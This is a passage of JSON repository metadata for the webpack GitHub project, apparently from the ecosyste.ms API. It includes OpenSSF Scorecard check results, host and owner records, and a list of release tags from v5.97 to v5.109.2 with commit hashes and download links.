fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97